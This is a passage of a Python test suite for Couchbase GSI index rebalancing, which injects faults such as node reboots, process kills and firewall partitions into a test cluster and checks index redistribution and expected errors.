self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [], swap_rebalance=False)
# do a rebalance
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init + 1], [], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
def test_reboot_on_kv_node_during_gsi_rebalance(self):
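# Reboot a kv node while an indexer node is being rebalanced out; the rebalance is expected
# to fail ("Rebalance stopped by janitor"), after which /cleanupRebalance is run on all index nodes.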
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(15)
# reboot a kv node during gsi rebalance
self.reboot_node(kv_server[1])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance stopped by janitor" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after kv node reboot")
self.sleep(30)
self.run_operation(phase="after")
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
def test_cbindex_move_invalid_data(self):
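# Negative test: run cbindex move / alter index with a missing destination host, missing
# index names, and names of already dropped indexes, and verify each case fails with the expected error.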
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with destination host not specified
output, error = self._cbindex_move(index_server,
" ",
indexes,
expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
# cbindex move with index names not specified
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
" ",
expect_failure=True,
alter_index=self.alter_index)
expected_err_msg = "invalid index specified"
if self.alter_index:
expected_err_msg = "syntax error"
if expected_err_msg not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
# cbindex move with index name which does not exist
self.run_async_index_operations(operation_type="drop_index")
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
expect_failure=True,
alter_index=self.alter_index)
expected_err_msg = "invalid index specified"
if self.alter_index:
expected_err_msg = "not found"
if expected_err_msg not in str(error):
self.fail(
"cbindex move did not fail with expected error message")
else:
self.log.info("Index alteration failed as expected")
def test_rebalance_in_with_different_topologies(self):
self.services_in = self.input.param("services_in")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=[self.services_in])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [])
self.run_operation(phase="after")
def test_rebalance_out_with_different_topologies(self):
self.server_out = self.input.param("server_out")
# pick an n1ql node other than the one being rebalanced out to run queries against
all_n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
for n1ql_node in all_n1ql_nodes:
if n1ql_node.ip not in str(self.servers[self.server_out]):
self.n1ql_server = n1ql_node
self.n1ql_node = n1ql_node
break
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.servers[self.server_out]
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
self.run_operation(phase="after")
def test_swap_rebalance_with_different_topologies(self):
self.server_out = self.input.param("server_out")
self.services_in = self.input.param("services_in")
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.servers[self.server_out]
# pick an n1ql node other than the one being rebalanced out to run queries against
all_n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
for n1ql_node in all_n1ql_nodes:
if n1ql_node.ip not in str(self.servers[self.server_out]):
self.n1ql_server = n1ql_node
self.n1ql_node = n1ql_node
break
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[], services=[self.services_in])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
[nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
self.run_operation(phase="after")
def test_backup_restore_after_gsi_rebalance(self):
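# Rebalance out an index node, verify index redistribution, then run a backup and
# restore against a kv node.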
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self.run_operation(phase="after")
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self._create_backup(kv_node)
self._create_restore(kv_node)
def test_backup_restore_while_gsi_rebalance_is_running(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
self._create_backup(kv_node)
self._create_restore(kv_node)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self._run_prepare_statement()
self.run_operation(phase="after")
def test_gsi_rebalance_using_couchbase_cli(self):
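# Drive the rebalance through couchbase-cli instead of the cluster API: rebalance out an
# index node, verify redistribution, then server-add a node and rebalance it back in.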
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
shell = RemoteMachineShellConnection(kv_node)
command = "{0}couchbase-cli rebalance -c {1} -u {2} -p {3} --server-remove={4}:8091".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password,
nodes_out_list.ip)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
self.sleep(30)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
# rebalance in a node
command = "{0}couchbase-cli server-add -c {1} -u {2} -p {3} --server-add={4} --server-add-username={5} " \
"--server-add-password={6}".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password,
self.servers[self.nodes_init].ip, self.servers[self.nodes_init].rest_username,
self.servers[self.nodes_init].rest_password)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
if e or not [x for x in o if 'SUCCESS: Server added' in x]:
self.fail("server-add failed")
self.sleep(30)
command = "{0}couchbase-cli rebalance -c {1} -u {2} -p {3}".format(
self.cli_command_location,
kv_node.ip, kv_node.rest_username,
kv_node.rest_password)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
if e or not [x for x in o if 'SUCCESS: Rebalance complete' in x]:
self.fail("rebalance failed")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.run_operation(phase="after")
def test_long_running_scan_with_gsi_rebalance(self):
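# Build a multi-field index, run long-running full-table GSI scans in background threads
# while swapping index nodes in and out, and verify index redistribution afterwards.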
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
emit_fields = "*"
body = {"stale": "False"}
query_definition = QueryDefinition(
index_name="multiple_field_index",
index_fields=["name", "age", "email", "premium_customer"],
query_template=RANGE_SCAN_TEMPLATE.format(emit_fields, " %s " %
"name > \"Adara\" AND "
"name < \"Winta\" "
"AND age > 0 AND age "
"< 100 ORDER BY _id"),
groups=["multiple_field_index"],
index_where_clause=" name IS NOT NULL ")
self.rest = RestConnection(nodes_out_list)
id_map = self.create_index_using_rest(self.buckets[0], query_definition)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# run a long running scan during a gsi rebalance
t1 = threading.Thread(target=RestConnection(nodes_out_list).full_table_scan_gsi_index_with_rest,
args=(id_map["id"], body,))
t1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
t2 = threading.Thread(target=RestConnection(self.servers[self.nodes_init]).full_table_scan_gsi_index_with_rest,
args=(id_map["id"], body,))
t2.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t2.join()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_reboot_on_indexer_node_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# reboot the newly added indexer node during gsi rebalance
self.reboot_node(self.servers[self.nodes_init])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
self.sleep(30)
self.run_operation(phase="after")
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
# yet to confirm if parallel cbindex moves are supported; hoping to catch a panic if they're not
def test_cbindex_move_when_one_move_index_is_already_running(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
for index in indexes:
threads.append(
threading.Thread(target=self._cbindex_move, args=(index_server, self.servers[self.nodes_init], index, self.alter_index)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.sleep(60)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_kill_n1ql_during_gsi_rebalance(self):
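# Repeatedly kill the cbq-engine process on the n1ql node while index nodes are being
# swap rebalanced; the rebalance should still complete and the indexes should move.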
self.run_operation(phase="before")
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill n1ql while rebalance is running
self.sleep(5)
for i in range(20):
self._kill_all_processes_cbq(n1ql_node)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_kill_indexer_during_gsi_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# rebalance out the old indexer node to complete the swap
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill indexer while rebalance is running
for i in range(20):
self._kill_all_processes_index(self.servers[self.nodes_init])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after killing indexer node")
self.sleep(60)
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
def test_autofailover_with_gsi_rebalance(self):
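# Stop the server on a kv node and wait for autofailover, then rebalance out both the
# failed-over kv node and an index node and verify the remaining index map.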
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
RestConnection(self.master).update_autofailover_settings(True, 30)
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
index_node = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
remote = RemoteMachineShellConnection(kv_node[1])
remote.stop_server()
self.sleep(40, "Wait for autofailover")
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [index_node, kv_node[1]])
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
self.fail("rebalance failed with error : {0}".format(str(ex)))
finally:
remote.start_server()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_node])
self.run_operation(phase="after")
self.sleep(30)
def test_gsi_rebalance_can_be_resumed_after_failed_gsi_rebalance(self):
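# Force a rebalance failure by rebooting the indexer node being rebalanced out, then
# retry the same rebalance (up to 5 attempts) and verify it eventually succeeds.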
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# reboot the indexer node being rebalanced out during gsi rebalance
self.reboot_node(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
self.sleep(60)
# Rerun rebalance to check if it can recover from failure
for i in range(5):
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" in str(ex) and i == 4:
self.fail("rebalance did not recover from failure : {0}".format(str(ex)))
# Rerun after MB-23900 is fixed.
else:
break
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_server])
self.run_operation(phase="after")
def test_induce_fts_failure_during_gsi_rebalance(self):
self.run_operation(phase="before")
fts_node = self.get_nodes_from_services_map(service_type="fts", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.sleep(5)
for i in range(20):
self._kill_fts_process(fts_node)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# kill fts while rebalance is running
self.sleep(5)
for i in range(20):
self._kill_fts_process(fts_node)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_on_deferred_index_then_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# create index with defer_build = True
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Move the indexes
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
log.info(indexes)
self.sleep(2)
i = 1
for index in indexes:
self._cbindex_move(index_server, self.servers[self.nodes_init], index, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], i)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
i += 1
self.sleep(60)
# Now build the index on the new node
exceptions = self._build_index()
if exceptions:
self.fail("build index after rebalance failed")
# Move the indexes again
j = 1
for index in indexes:
self._cbindex_move(self.servers[self.nodes_init], index_server, index, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(index_server, j)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
j += 1
self.sleep(60)
self.run_operation(phase="after")
def test_cbindex_move_with_reboot_of_destination_node(self):
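# Kick off cbindex moves to the newly added index node and reboot that destination node
# mid-move; the move is expected to fail with a "connection refused" error on port 9100.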
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
msg = ""
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue))
threads.append(t1)
t1.start()
self.sleep(1)
self.reboot_node(self.servers[self.nodes_init])
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "dial tcp {0}:9100: getsockopt: connection refused".format(
self.servers[self.nodes_init].ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail during a reboot")
def test_cbindex_move_after_network_partitioning(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
try:
self.start_firewall_on_node(index_server)
output, error = self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, self.alter_index,
expect_failure=True)
if not [x for x in error if 'Client.Timeout exceeded while awaiting headers' in x]:
if not [x for x in error if 'i/o timeout' in x]:
self.fail("cbindex move did not fail during network partition with expected error message : {0}".format(
error))
except Exception as ex:
self.fail(str(ex))
finally:
self.stop_firewall_on_node(index_server)
self.run_operation(phase="after")
def test_partition_n1ql_during_gsi_rebalance(self):
self.run_operation(phase="before")
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
# partition n1ql node while running gsi rebalance
self.sleep(5)
for i in range(5):
self.start_firewall_on_node(n1ql_node)
self.stop_firewall_on_node(n1ql_node)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
except Exception as ex:
self.fail("gsi rebalance failed because firewall was enabled on n1ql node : {0}".format(str(ex)))
finally:
self.stop_firewall_on_node(n1ql_node)
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_with_reboot_of_source_node(self):
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves in parallel
msg = ""
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue, True))
threads.append(t1)
t1.start()
self.sleep(2)
self.reboot_node(index_server)
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "dial tcp {0}:9100: getsockopt: connection refused".format(index_server.ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
# queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail during a reboot")
def test_network_partitioning_between_kv_indexer_during_gsi_rebalance(self):
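# Firewall off the outgoing indexer, the newly added indexer and a kv node while an index
# node is being rebalanced out; the rebalance is expected to fail, and the firewalls are removed in finally.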
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
kv_node_partition = kv_server[1]
if kv_server[1] == self.servers[0]:
kv_node_partition = kv_server[0]
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
# rebalance out an indexer node
log.info("start rebalance during network partitioning")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.start_firewall_on_node(index_server)
self.start_firewall_on_node(self.servers[self.nodes_init])
self.start_firewall_on_node(kv_node_partition)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after kv index network partitioning")
finally:
self.stop_firewall_on_node(index_server)
self.stop_firewall_on_node(self.servers[self.nodes_init])
self.stop_firewall_on_node(kv_node_partition)
self.run_operation(phase="after")
def test_cbindex_move_with_index_server_being_killed(self):
queue = Queue()
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes = []
for bucket in map_before_rebalance:
for index in map_before_rebalance[bucket]:
indexes.append(index)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
threads = []
# start multiple cbindex moves
msg = ""
for index in indexes:
t1 = threading.Thread(target=self._cbindex_move,
args=(index_server, self.servers[self.nodes_init], index, self.alter_index, queue, True))
threads.append(t1)
t1.start()
self.sleep(2)
self._kill_all_processes_index(index_server)
